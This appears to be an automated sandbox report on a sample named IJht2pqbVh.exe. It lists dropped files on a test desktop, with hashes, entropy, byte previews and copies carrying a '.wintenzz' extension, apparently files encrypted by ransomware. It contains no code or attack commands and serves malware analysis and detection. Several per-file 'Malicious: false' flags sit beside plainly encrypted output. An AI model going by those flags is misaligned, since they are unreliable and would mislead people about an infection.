C:\Users\user\Desktop\BXAJUJAOEO\LHEPQPGEWF.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.820751009595102
Encrypted:	false
SSDEEP:	24:f7EGc5fTjM7kStzXFsy/DBa6UxFZTyuabUejVihHimG:fIVj0dtziyrBaxRyuabmHimG
MD5:	68E12E5A86392A27FC9B7D7DB845FD9A
SHA1:	8536B2D00A776124651B773FA1A948657D8ED748
SHA-256:	64C89B9046E0B1178C0002234935A8C38E5AEAB8C7FAE2D22B8CA7E11B389197
SHA-512:	04022F4596ABED57DA7CBCA81DB0613983081B565859B0D3CACC3424DEC45C00609C13EA3E1A5B99C02133FF2BA1109900E3E50653927E6814BE2839CCBEC231
Malicious:	false
Preview:	................kEdroUgEYobMtiRjFYeGbNuN........._k....LAX../..].B'M..z..-`........xe.....<..?tM.....K.[..).]i.4.......k......C+.Do.M.e5.h^......y....,..~4.....s..}..._..B.qr....\>d..Vk.Q..]t......_.^yx.....,U.Q.r..]..!.<.;J{C..............0........_G.y.W..;./.N.G.>C..E..,..7.r..;6./Z.9..3.W..m...'.....?>.s....r1..=..@:k...jI.....X.+M......$o4.$.....k%o.T.....E.....3r7..e.A.r.,.C%..8..m;.(.......u.j....5.N.h.M..\|..6T.n`ES...J..#._.....!Z.H...5.b@Z.m..V..Z.tm1...(G..1....?..G....[.k.^5.....y.......].{....!.....)....P.v.......0...4."BZ 7....:C/.d.(.uq........$..&.u...\|[._Z..R.v......H....+.....xO...%....i.V.m......W..P..u(t"....d..Lb......6}h..../....h.$u..7A.k......MR..VY.8zq........:X..?.o..........d/.iP.(T..V..\.N.Mz.....5.gdb.f.RC.ir.......^.fJ^..G..8.F{#.rl..f..t..c.%p....)`........[..`x..c..`'....E.f..=.,.k.......L.j.....>.b.55.2.....im.(.:.Q..f\|.4R...V?u..~Y.>H.`.w..:..?3.3.n...U..}..JM.....q.'...@m.....:.d.........3}...

C:\Users\user\Desktop\BXAJUJAOEO\LHEPQPGEWF.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.820751009595102
Encrypted:	false
SSDEEP:	24:f7EGc5fTjM7kStzXFsy/DBa6UxFZTyuabUejVihHimG:fIVj0dtziyrBaxRyuabmHimG
MD5:	68E12E5A86392A27FC9B7D7DB845FD9A
SHA1:	8536B2D00A776124651B773FA1A948657D8ED748
SHA-256:	64C89B9046E0B1178C0002234935A8C38E5AEAB8C7FAE2D22B8CA7E11B389197
SHA-512:	04022F4596ABED57DA7CBCA81DB0613983081B565859B0D3CACC3424DEC45C00609C13EA3E1A5B99C02133FF2BA1109900E3E50653927E6814BE2839CCBEC231
Malicious:	false
Preview:	................kEdroUgEYobMtiRjFYeGbNuN........._k....LAX../..].B'M..z..-`........xe.....<..?tM.....K.[..).]i.4.......k......C+.Do.M.e5.h^......y....,..~4.....s..}..._..B.qr....\>d..Vk.Q..]t......_.^yx.....,U.Q.r..]..!.<.;J{C..............0........_G.y.W..;./.N.G.>C..E..,..7.r..;6./Z.9..3.W..m...'.....?>.s....r1..=..@:k...jI.....X.+M......$o4.$.....k%o.T.....E.....3r7..e.A.r.,.C%..8..m;.(.......u.j....5.N.h.M..\|..6T.n`ES...J..#._.....!Z.H...5.b@Z.m..V..Z.tm1...(G..1....?..G....[.k.^5.....y.......].{....!.....)....P.v.......0...4."BZ 7....:C/.d.(.uq........$..&.u...\|[._Z..R.v......H....+.....xO...%....i.V.m......W..P..u(t"....d..Lb......6}h..../....h.$u..7A.k......MR..VY.8zq........:X..?.o..........d/.iP.(T..V..\.N.Mz.....5.gdb.f.RC.ir.......^.fJ^..G..8.F{#.rl..f..t..c.%p....)`........[..`x..c..`'....E.f..=.,.k.......L.j.....>.b.55.2.....im.(.:.Q..f\|.4R...V?u..~Y.>H.`.w..:..?3.3.n...U..}..JM.....q.'...@m.....:.d.........3}...

C:\Users\user\Desktop\BXAJUJAOEO\NIRMEKAMZH.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.77239308805349
Encrypted:	false
SSDEEP:	24:T5W+WMo/UgTvWL1eWiwYywi/HH2/lGzL2QMVy60fL5TQ:Rh0UWYe9QIh+TS
MD5:	46704A3BA091D684695D033B0C496657
SHA1:	623ED6B2EB678EF5AC5399B8AEE2D300613D54A5
SHA-256:	BB1297E4BE9DB7D494C8FB7EBC74F18B1F9E2FAD5AFEBCAA26CD2D31459ADC72
SHA-512:	F5FBC2DF235DDD75866AA4B21CB2ADCED00A383FDCE15074A1407376CADD6326E430A50A2E54ED89A2FE2F4E2C56952FE057E042C5D64F3FD21132045BEC05D3
Malicious:	false
Preview:	................hoXWihAzqoxW9fegwSbmXlor.........%.........2...x....>)dM.......W.><.h..?r.4..e`......3.T...v....2..0./Q.j.=.... .A..&......T\I.1..,.....$[......wi..5V%.......SP...xJ!.?Z....K.\..3g.jo.......&Q.d.u..7{...=....^.n...J.....Z..m..~..'.h......Z..?..)....4.\..`........~.0.....Qi...\..@B.6..&]............]..}..zEg^_.b4.k./...d..i.(..rz$.;~..Y....Pa2...IaG......4.p=^.[m.BVV.g.M!{..@{.bP.x..aQy.Z..y...eMM.mM....h....<...~...(!.K}Y0....3.?_...I...z6+.....\.~<J...W..>l.z...?.....]...-?..W...!.[.....?Pv.E,-.....n-.r.....Iwjx.9T-...DY.....8...8.vU...lq...].t..\|.tP..X.?...M...\|.X6c...Vd......$wS]....XnG.a.....<x.]#.\|......Nc.#......9L"......nLlI.k=.T,H..U......E.........<.\{......7H..........)..._B.UAu4.9x.n(d6!....C..v8..5._.r.Gw..+...x.k..I5.(i{.\..9....E;M.Ho.p=[q.c(.%.u.-&Q}...~..U...S.........xS..^6......W....w5.O...{.e....Wt.4M....:..'.$.../f/,.H..}o._.%`......o.B..]....a..>t....T......."9D...5@cE.......kd=..H.e........u.

C:\Users\user\Desktop\BXAJUJAOEO\NIRMEKAMZH.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.77239308805349
Encrypted:	false
SSDEEP:	24:T5W+WMo/UgTvWL1eWiwYywi/HH2/lGzL2QMVy60fL5TQ:Rh0UWYe9QIh+TS
MD5:	46704A3BA091D684695D033B0C496657
SHA1:	623ED6B2EB678EF5AC5399B8AEE2D300613D54A5
SHA-256:	BB1297E4BE9DB7D494C8FB7EBC74F18B1F9E2FAD5AFEBCAA26CD2D31459ADC72
SHA-512:	F5FBC2DF235DDD75866AA4B21CB2ADCED00A383FDCE15074A1407376CADD6326E430A50A2E54ED89A2FE2F4E2C56952FE057E042C5D64F3FD21132045BEC05D3
Malicious:	false
Preview:	................hoXWihAzqoxW9fegwSbmXlor.........%.........2...x....>)dM.......W.><.h..?r.4..e`......3.T...v....2..0./Q.j.=.... .A..&......T\I.1..,.....$[......wi..5V%.......SP...xJ!.?Z....K.\..3g.jo.......&Q.d.u..7{...=....^.n...J.....Z..m..~..'.h......Z..?..)....4.\..`........~.0.....Qi...\..@B.6..&]............]..}..zEg^_.b4.k./...d..i.(..rz$.;~..Y....Pa2...IaG......4.p=^.[m.BVV.g.M!{..@{.bP.x..aQy.Z..y...eMM.mM....h....<...~...(!.K}Y0....3.?_...I...z6+.....\.~<J...W..>l.z...?.....]...-?..W...!.[.....?Pv.E,-.....n-.r.....Iwjx.9T-...DY.....8...8.vU...lq...].t..\|.tP..X.?...M...\|.X6c...Vd......$wS]....XnG.a.....<x.]#.\|......Nc.#......9L"......nLlI.k=.T,H..U......E.........<.\{......7H..........)..._B.UAu4.9x.n(d6!....C..v8..5._.r.Gw..+...x.k..I5.(i{.\..9....E;M.Ho.p=[q.c(.%.u.-&Q}...~..U...S.........xS..^6......W....w5.O...{.e....Wt.4M....:..'.$.../f/,.H..}o._.%`......o.B..]....a..>t....T......."9D...5@cE.......kd=..H.e........u.

C:\Users\user\Desktop\BXAJUJAOEO\PWZOQIFCAN.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786696007313809
Encrypted:	false
SSDEEP:	24:Vi7nhO2uZY63D00yJqKxW3ylB+mxOeAeS2I1xO9ziG:IkZd3D09v+AOeJS2mO9H
MD5:	3E562E56105F6F61409348B4DAFD621C
SHA1:	0C08C05382CC54CEDF0DF23F5B6ECA97B689C72E
SHA-256:	CF73EE87FC2FE4CBF04DC9BE4E5395C24CB3E3CED652B4A080F51C22C26F13C3
SHA-512:	163739E8BC0516B2F9B8ABA7A18226B8EC618EC5F03D19CAC98E9EC7C80C24344BF1C2B9E8BF4A55A31E51C1C15A34DB23A678B7F7ADBB6BEA29B2824A26097E
Malicious:	false
Preview:	................llRQCD9csowzbjZCLrdYyKFz.........P..-....$.J.m...\|...q...N..a2u@}..1..0Hk!....y}........<i.qZ.Do..:{.%...n</Ej.i.@...9.......0.^oA7..o..=.I...kXR~>..t..#O_].Q/7...<IC..k.....=.k..{d..K.}q.u`..w.p!Ll...t[98.Lf..t....#A.e....l.....h.N.a)........=...\........A.c...p!.-.{.l.-_:N..7..P.........4...W.'..4.b.5....."U."..8...!.&.....5...I0S...Z&d..bV(B.G........qW..)>..'.x....Q..Y...7..}..k...^B......).k...v.p....<.T_8.tV.N~=.......0.s..&.4....O.p..w....O.e.W.....^+>...L<.]$H..x..+...0.i8.f.n)\...yXB..=,..a...v...D...j..Q....\..O.Fq.s.[.s:.P..J%...C...OO.W........".L9.......4.f...._\|.F..Y.)Co......z$...>A......)\Z8.....OW..iH...h...f.j{`v..1-.~.#/.%....rQ..1....g&..~H..zv..O..=.......8.h.H[.....;...C....#.......%...A.q..h.h#9.(7..:...R^.....]..).j.7j.....-~...`..h....9..K..6..b.KC..]..T......_.X.i......8).^x.....;...^..... C......X.a..P..E.<Par........P..H.G.9j.tq.4{.....a+....M.^.k...qNhC..8...M_....O........R.x.B.L....

C:\Users\user\Desktop\BXAJUJAOEO\PWZOQIFCAN.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786696007313809
Encrypted:	false
SSDEEP:	24:Vi7nhO2uZY63D00yJqKxW3ylB+mxOeAeS2I1xO9ziG:IkZd3D09v+AOeJS2mO9H
MD5:	3E562E56105F6F61409348B4DAFD621C
SHA1:	0C08C05382CC54CEDF0DF23F5B6ECA97B689C72E
SHA-256:	CF73EE87FC2FE4CBF04DC9BE4E5395C24CB3E3CED652B4A080F51C22C26F13C3
SHA-512:	163739E8BC0516B2F9B8ABA7A18226B8EC618EC5F03D19CAC98E9EC7C80C24344BF1C2B9E8BF4A55A31E51C1C15A34DB23A678B7F7ADBB6BEA29B2824A26097E
Malicious:	false
Preview:	................llRQCD9csowzbjZCLrdYyKFz.........P..-....$.J.m...\|...q...N..a2u@}..1..0Hk!....y}........<i.qZ.Do..:{.%...n</Ej.i.@...9.......0.^oA7..o..=.I...kXR~>..t..#O_].Q/7...<IC..k.....=.k..{d..K.}q.u`..w.p!Ll...t[98.Lf..t....#A.e....l.....h.N.a)........=...\........A.c...p!.-.{.l.-_:N..7..P.........4...W.'..4.b.5....."U."..8...!.&.....5...I0S...Z&d..bV(B.G........qW..)>..'.x....Q..Y...7..}..k...^B......).k...v.p....<.T_8.tV.N~=.......0.s..&.4....O.p..w....O.e.W.....^+>...L<.]$H..x..+...0.i8.f.n)\...yXB..=,..a...v...D...j..Q....\..O.Fq.s.[.s:.P..J%...C...OO.W........".L9.......4.f...._\|.F..Y.)Co......z$...>A......)\Z8.....OW..iH...h...f.j{`v..1-.~.#/.%....rQ..1....g&..~H..zv..O..=.......8.h.H[.....;...C....#.......%...A.q..h.h#9.(7..:...R^.....]..).j.7j.....-~...`..h....9..K..6..b.KC..]..T......_.X.i......8).^x.....;...^..... C......X.a..P..E.<Par........P..H.G.9j.tq.4{.....a+....M.^.k...qNhC..8...M_....O........R.x.B.L....

C:\Users\user\Desktop\DQOFHVHTMG.pdf Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.831783426174795
Encrypted:	false
SSDEEP:	24:25BbLbppFRE1HiFszXBjFwDzCaTt7dYnhHFc9PEKJti:2vb/FRE1ZzXB5ICaTI29PxJti
MD5:	D74F155B059AFF0ACCD4B8EAFC21E758
SHA1:	54C4760B0C47203A38E5D53F0F08CDDA64547667
SHA-256:	571D52F7EC242C08EACD0422DCF585C9A5EDB24AFA14941D343BACA92F1025DB
SHA-512:	3E72622983E59CFD66C24A087DC62F832E5D72EC81720BCEAE530C5B25DF6B1BFE5D4FCD3DC04322208F9D4AD5E2CA9601EB1E0280B03A95F3DD2441E250F4D0
Malicious:	false
Preview:	................aXVSAdpKpz6zzNddHgDSwGEZ........F..mQ.g......H.!..A8..VG...k=.v.....~.Q...A.8u..?....3....n^.....uC.Mj..@.\.i....^%4........g.t...Eh........oFk.......O...kC.Kp.f....u:[.U......]K..l....qp./g.9n...,=..+...$(hC.v6k....h...7x..$...P...,....4...to.....O..WEw:.).....m\)..r4`^sX2^...H..X&%.f...aR....q..?F.9\|{[.#.sW...y......e3e.k8.x.....,.()_.U.SJ...3Vq~....Y@..z.......,5M...O.Gv.......y.....``.U......y.D...2[V.:...vl..B~O....(y/=8...Rb.@-...(.o_..L.d.H.....1hr...)."..X.L....=.M..5#....V.Z...B....$...../.......lB....4+.E..F... ......2.T$...~..u...B.).c......R4../.........m..D.@9...^...R.-..h.....=..P.KGu'................N...3.t..(...3.l6J......g1v.....B...ea......)w.29..7r?'.}.h..:..&..o."....\|.D..;.iy...V..O.8.C.......p...Hy..^W..g.....f.PNB..I...l..d.j..../.../.O.s..u'....zN.".^.{g_..Xar%M3..Q...E...72.@...F8.8Gj.%.X$2@..<A....N../fW..Q....9J.....Z.C..27...D"8.N0..w.dJF...-If.B.{I1=.ei}...../In.%Gs.0..._.}6[R9..

C:\Users\user\Desktop\DQOFHVHTMG.pdf.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.831783426174795
Encrypted:	false
SSDEEP:	24:25BbLbppFRE1HiFszXBjFwDzCaTt7dYnhHFc9PEKJti:2vb/FRE1ZzXB5ICaTI29PxJti
MD5:	D74F155B059AFF0ACCD4B8EAFC21E758
SHA1:	54C4760B0C47203A38E5D53F0F08CDDA64547667
SHA-256:	571D52F7EC242C08EACD0422DCF585C9A5EDB24AFA14941D343BACA92F1025DB
SHA-512:	3E72622983E59CFD66C24A087DC62F832E5D72EC81720BCEAE530C5B25DF6B1BFE5D4FCD3DC04322208F9D4AD5E2CA9601EB1E0280B03A95F3DD2441E250F4D0
Malicious:	false
Preview:	................aXVSAdpKpz6zzNddHgDSwGEZ........F..mQ.g......H.!..A8..VG...k=.v.....~.Q...A.8u..?....3....n^.....uC.Mj..@.\.i....^%4........g.t...Eh........oFk.......O...kC.Kp.f....u:[.U......]K..l....qp./g.9n...,=..+...$(hC.v6k....h...7x..$...P...,....4...to.....O..WEw:.).....m\)..r4`^sX2^...H..X&%.f...aR....q..?F.9\|{[.#.sW...y......e3e.k8.x.....,.()_.U.SJ...3Vq~....Y@..z.......,5M...O.Gv.......y.....``.U......y.D...2[V.:...vl..B~O....(y/=8...Rb.@-...(.o_..L.d.H.....1hr...)."..X.L....=.M..5#....V.Z...B....$...../.......lB....4+.E..F... ......2.T$...~..u...B.).c......R4../.........m..D.@9...^...R.-..h.....=..P.KGu'................N...3.t..(...3.l6J......g1v.....B...ea......)w.29..7r?'.}.h..:..&..o."....\|.D..;.iy...V..O.8.C.......p...Hy..^W..g.....f.PNB..I...l..d.j..../.../.O.s..u'....zN.".^.{g_..Xar%M3..Q...E...72.@...F8.8Gj.%.X$2@..<A....N../fW..Q....9J.....Z.C..27...D"8.N0..w.dJF...-If.B.{I1=.ei}...../In.%Gs.0..._.}6[R9..

C:\Users\user\Desktop\FAAGWHBVUU.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.80978908420011
Encrypted:	false
SSDEEP:	24:zgySuPFUCRP0dfQG5+YNRdYfb1K40FdwcMXE7zjpBO:MySyFUCe6nYNRdmK40FOcM+O
MD5:	3BC5AD09A4F6EA88C0D038395546DA52
SHA1:	2583BD381BFE7ECB25DA208A801BE7F4285B3A90
SHA-256:	6EA6DD7DBB7760E851110D414EE9A60E9736C3E52109A22AD960DE86399722D0
SHA-512:	3EB0977DA15DA1046438D4D0D375DC6C2836C961BC4819C286FB69AAD5CEF3531ECCDCDEF4B5DFAFF89FA6393AD2D088C6F1ADD351F38822010AC4A4F63E1792
Malicious:	false
Preview:	................MaXhAgVqW58glpK2fMvWsies.........Oh...l'..(..".%..>..........~S..N...[tV.M...O...S....u...+%...]f..l....}.....9%O1.jm:i..D.[..a..4..Ur..]...0.g7.I.x.V]].}D...'.J......[=.....w.g..[.$...N.1.BZlD.,.G\|..Gt0. <.~....67.......\|..#.-.R....k..X....E.F.3EZv...b.XS.m..3.c..q!...7-F..'G.f.e.d.fTR....P..:.7t@..eD;.;m-.Y....}..i.2.n...b....F.j......5.k....O%}1Cn....$..bm.=...=I..L9....A._z.p9.I..T(.p.....tc..Lw.........VQ...H..9]......i.#J...9.#..PG.. mSBHl.i..5..t.]le....}...SP.4.....i..c..c(....N......FD.x...X....;..j.l.e.....qX.;.z..7...>.wd..Q..WVG.D8....{...=..r..y....A..z.lI...\|/.....8..&.D/6\|... .<...$.....z..5(...w8.4_.:....h.~.0..SHK}....?..........Y.G..yMX.o......;..A..,.w...Y..%........0.H...f..R.B.g........>.I..Lo...Q..\|VK.)....q,..o+mc....%+z.......v.$.Ud.v.f..~/....,.ku..dp.....O.J....0..[......=..P'..\Q..D.~.m.>.d((V.d!.....k..v.......:j6.J.Dk...D....4......U..(.*.......<~.....v?..x.w........q@.;....Y...P.....g...;......\|v.

C:\Users\user\Desktop\FAAGWHBVUU.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.80978908420011
Encrypted:	false
SSDEEP:	24:zgySuPFUCRP0dfQG5+YNRdYfb1K40FdwcMXE7zjpBO:MySyFUCe6nYNRdmK40FOcM+O
MD5:	3BC5AD09A4F6EA88C0D038395546DA52
SHA1:	2583BD381BFE7ECB25DA208A801BE7F4285B3A90
SHA-256:	6EA6DD7DBB7760E851110D414EE9A60E9736C3E52109A22AD960DE86399722D0
SHA-512:	3EB0977DA15DA1046438D4D0D375DC6C2836C961BC4819C286FB69AAD5CEF3531ECCDCDEF4B5DFAFF89FA6393AD2D088C6F1ADD351F38822010AC4A4F63E1792
Malicious:	false
Preview:	................MaXhAgVqW58glpK2fMvWsies.........Oh...l'..(..".%..>..........~S..N...[tV.M...O...S....u...+%...]f..l....}.....9%O1.jm:i..D.[..a..4..Ur..]...0.g7.I.x.V]].}D...'.J......[=.....w.g..[.$...N.1.BZlD.,.G\|..Gt0. <.~....67.......\|..#.-.R....k..X....E.F.3EZv...b.XS.m..3.c..q!...7-F..'G.f.e.d.fTR....P..:.7t@..eD;.;m-.Y....}..i.2.n...b....F.j......5.k....O%}1Cn....$..bm.=...=I..L9....A._z.p9.I..T(.p.....tc..Lw.........VQ...H..9]......i.#J...9.#..PG.. mSBHl.i..5..t.]le....}...SP.4.....i..c..c(....N......FD.x...X....;..j.l.e.....qX.;.z..7...>.wd..Q..WVG.D8....{...=..r..y....A..z.lI...\|/.....8..&.D/6\|... .<...$.....z..5(...w8.4_.:....h.~.0..SHK}....?..........Y.G..yMX.o......;..A..,.w...Y..%........0.H...f..R.B.g........>.I..Lo...Q..\|VK.)....q,..o+mc....%+z.......v.$.Ud.v.f..~/....,.ku..dp.....O.J....0..[......=..P'..\Q..D.~.m.>.d((V.d!.....k..v.......:j6.J.Dk...D....4......U..(.*.......<~.....v?..x.w........q@.;....Y...P.....g...;......\|v.

C:\Users\user\Desktop\GNLQNHOLWB.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7780883556145834
Encrypted:	false
SSDEEP:	24:BwXq6NTnJd1s/xxDogtUW7pupYeHzLw07YF1i8ZC:Byqgnts/HcWVkHzL1GZC
MD5:	279C351B57A1B45B37E81C4D0EBE1287
SHA1:	92A827129D2EA22D7F79AD94492FB5D0DD44D67B
SHA-256:	25FC9477BD48A81781726CFBB85FBABEF8DC0F8575666662AB69CB40C520DEF9
SHA-512:	F036C651A4BB063DC5DC9B6D937CE7F88905D53907489B2F1C0F928FBBC704913E5EE6ECEBE8AEB8BBD8F3B75D707FB1C7A53F5425E391571FBA0E3F6EB24040
Malicious:	false
Preview:	................G5mAwNWb8pRTW0bzldljq2Ng............=...../.6..... .....{(...S.k.V......D..u.g}7&.....E.....>...,...~..:....H&.g............a.D../.. .#d\|.P2>B..6.x..q.$.V.vu"....5}...RQ.(n..Rk.."...[.Q\|D@C......d@.N.......b..........=)...Ja+.0....k.<%N..2k.":...qlI....D..G.I..g.".Q.G/.......j.v..s.6.....xmG....~............(0..u..M(........t........P,............7....<lo....s.y..U..4u#.............0{.9.#G..;d.\|blb.qG.:N:M(Z=B.......d..Q2.r..U+..e,.../.nJ..s[A....o}%.02..`x.".9.x..oi...`.)]k.~....=...L....<V{.qxI.e.....~..u.f.Pa..s.W...k..`0\|...8.m.t./.+.Bf......n.h.Ew.S...).E/~............K..\...Dx.GlQh]..^.(.....A.V..;....8Utv.&.....f...Cw<_W .~.:,...f.0......W........^M..r.T..I .....=......~.\|.g.......&._.....).W.&D...$.._.3.N..I....r...J<E...%....e.\|.j.3..+..U....{g...rmn...#I..(....=2.y...a:n..4..4'.1.4.0.hO..X.....CS..s,....i..t.&l{.q....oJ....Y..t...2Y..d...I......J...y.]/,....].!...y..C.<{..........g... <..(..DOs.i.6q;.E;........+..

C:\Users\user\Desktop\GNLQNHOLWB.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.7780883556145834
Encrypted:	false
SSDEEP:	24:BwXq6NTnJd1s/xxDogtUW7pupYeHzLw07YF1i8ZC:Byqgnts/HcWVkHzL1GZC
MD5:	279C351B57A1B45B37E81C4D0EBE1287
SHA1:	92A827129D2EA22D7F79AD94492FB5D0DD44D67B
SHA-256:	25FC9477BD48A81781726CFBB85FBABEF8DC0F8575666662AB69CB40C520DEF9
SHA-512:	F036C651A4BB063DC5DC9B6D937CE7F88905D53907489B2F1C0F928FBBC704913E5EE6ECEBE8AEB8BBD8F3B75D707FB1C7A53F5425E391571FBA0E3F6EB24040
Malicious:	false
Preview:	................G5mAwNWb8pRTW0bzldljq2Ng............=...../.6..... .....{(...S.k.V......D..u.g}7&.....E.....>...,...~..:....H&.g............a.D../.. .#d\|.P2>B..6.x..q.$.V.vu"....5}...RQ.(n..Rk.."...[.Q\|D@C......d@.N.......b..........=)...Ja+.0....k.<%N..2k.":...qlI....D..G.I..g.".Q.G/.......j.v..s.6.....xmG....~............(0..u..M(........t........P,............7....<lo....s.y..U..4u#.............0{.9.#G..;d.\|blb.qG.:N:M(Z=B.......d..Q2.r..U+..e,.../.nJ..s[A....o}%.02..`x.".9.x..oi...`.)]k.~....=...L....<V{.qxI.e.....~..u.f.Pa..s.W...k..`0\|...8.m.t./.+.Bf......n.h.Ew.S...).E/~............K..\...Dx.GlQh]..^.(.....A.V..;....8Utv.&.....f...Cw<_W .~.:,...f.0......W........^M..r.T..I .....=......~.\|.g.......&._.....).W.&D...$.._.3.N..I....r...J<E...%....e.\|.j.3..+..U....{g...rmn...#I..(....=2.y...a:n..4..4'.1.4.0.hO..X.....CS..s,....i..t.&l{.q....oJ....Y..t...2Y..d...I......J...y.]/,....].!...y..C.<{..........g... <..(..DOs.i.6q;.E;........+..

C:\Users\user\Desktop\LHEPQPGEWF.docx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.79592167668492
Encrypted:	false
SSDEEP:	24:Faz1HCpYu0RI7SNbq9e5t5STOeff2fIIkZ9uV/rp0p8DKPxIg91K:FaBHqMy99ej8yefOfI1Ludyp8D4xIgDK
MD5:	7BEDD205C2D3E447049DA68AF976324B
SHA1:	7733B74CDBACC86612408C5938C2DDBF2E24B214
SHA-256:	D8F8E04269F08E69CAC8F3463C63DE314567699C7E456200C9BCCA9AA29C56A4
SHA-512:	A06C9BA282ED9BBD79340FF91CE5D694E251114B4AE4D0AC808A647B63D4F49D8C7A6FE46B984B4778CC6C305B5EBD96B91EAFB6509E3245F259064A3F37D5A2
Malicious:	false
Preview:	................cq6KdzX7r7pXF0WxhOVyzYFu........3..D.X..T.lF~.-............M....F.3....9..6.9...\<........O.\.i1\|.Px.#....{#a..d....s........<b.d....?.B.sa.K>.<...0...t...6z.M'<..K..9/..........Sd.v.X...R4z...t...]:<d....g....T.....[.$.4..H2.....m....eF).O.(.ttR.[......./.9....Y...\|..Yd....du..dz.....x..B.e-`=~..Q..<X...z.vi...X6..C....zNgK...l.......\.....Fm.........yx.8.L./?...~..z...9...MO......q..........{.8............. .+P.....J ...y... .......l..>.H.2....=.......<.K3ja.........f...p.M.$..g.nFU.l.}T.c....s..c2..\|i...UW....N.X...q.1....H.(..F.!F...2.D...O.)....m....Z)..6;...=..L....b..6#.Zf.\|.e..N...u{%..i"......yD..>...it.....(..[...1.r...j.X.e.....u.p:f..z.....;....=.....:..Hx.q....ez.4.....$VL..7{..7k....o..F..j5.HKX..4i.yd._g.j9.:.l.;4)..f.c.'.\|........a..XNf..]...K..&.J....,.F.a..L?g....q...R....x@\,.Q.=5.A.!.).*.....Cbaw.E..v.h..d..}.....E..g..K:./;wg1...R.Y.0{P..y.1.?.U6..5..)..y.p........j.E..7`2....g..-...!..P.6.Zf..o

C:\Users\user\Desktop\LHEPQPGEWF.docx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.79592167668492
Encrypted:	false
SSDEEP:	24:Faz1HCpYu0RI7SNbq9e5t5STOeff2fIIkZ9uV/rp0p8DKPxIg91K:FaBHqMy99ej8yefOfI1Ludyp8D4xIgDK
MD5:	7BEDD205C2D3E447049DA68AF976324B
SHA1:	7733B74CDBACC86612408C5938C2DDBF2E24B214
SHA-256:	D8F8E04269F08E69CAC8F3463C63DE314567699C7E456200C9BCCA9AA29C56A4
SHA-512:	A06C9BA282ED9BBD79340FF91CE5D694E251114B4AE4D0AC808A647B63D4F49D8C7A6FE46B984B4778CC6C305B5EBD96B91EAFB6509E3245F259064A3F37D5A2
Malicious:	false
Preview:	................cq6KdzX7r7pXF0WxhOVyzYFu........3..D.X..T.lF~.-............M....F.3....9..6.9...\<........O.\.i1\|.Px.#....{#a..d....s........<b.d....?.B.sa.K>.<...0...t...6z.M'<..K..9/..........Sd.v.X...R4z...t...]:<d....g....T.....[.$.4..H2.....m....eF).O.(.ttR.[......./.9....Y...\|..Yd....du..dz.....x..B.e-`=~..Q..<X...z.vi...X6..C....zNgK...l.......\.....Fm.........yx.8.L./?...~..z...9...MO......q..........{.8............. .+P.....J ...y... .......l..>.H.2....=.......<.K3ja.........f...p.M.$..g.nFU.l.}T.c....s..c2..\|i...UW....N.X...q.1....H.(..F.!F...2.D...O.)....m....Z)..6;...=..L....b..6#.Zf.\|.e..N...u{%..i"......yD..>...it.....(..[...1.r...j.X.e.....u.p:f..z.....;....=.....:..Hx.q....ez.4.....$VL..7{..7k....o..F..j5.HKX..4i.yd._g.j9.:.l.;4)..f.c.'.\|........a..XNf..]...K..&.J....,.F.a..L?g....q...R....x@\,.Q.=5.A.!.).*.....Cbaw.E..v.h..d..}.....E..g..K:./;wg1...R.Y.0{P..y.1.?.U6..5..)..y.p........j.E..7`2....g..-...!..P.6.Zf..o

C:\Users\user\Desktop\LHEPQPGEWF.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.786786259862787
Encrypted:	false
SSDEEP:	24:ARiFJ+bhuVgnZf1OCCUZK+n7cspSwN3bnN5bNbRZH2:4iFJ+I7CjI+nrpr9VbW
MD5:	4F5565E9B946E510C19782268F6D688D
SHA1:	742AB850F1323A16318AFC3FFB4AD362020DC6EF
SHA-256:	CA871AF9585BFD1C69606E1FFCDE45D16B342B17ACF1A1D9F7BB0B1B4B6F8200
SHA-512:	10E84050911F61488397E3D3A17B49CFFA32CC701B775EF7C819B058530D9832F4EEB38FA793D3062C1A75B3E1FF26180FF2482F20A3388584E4471540F3437C
Malicious:	true
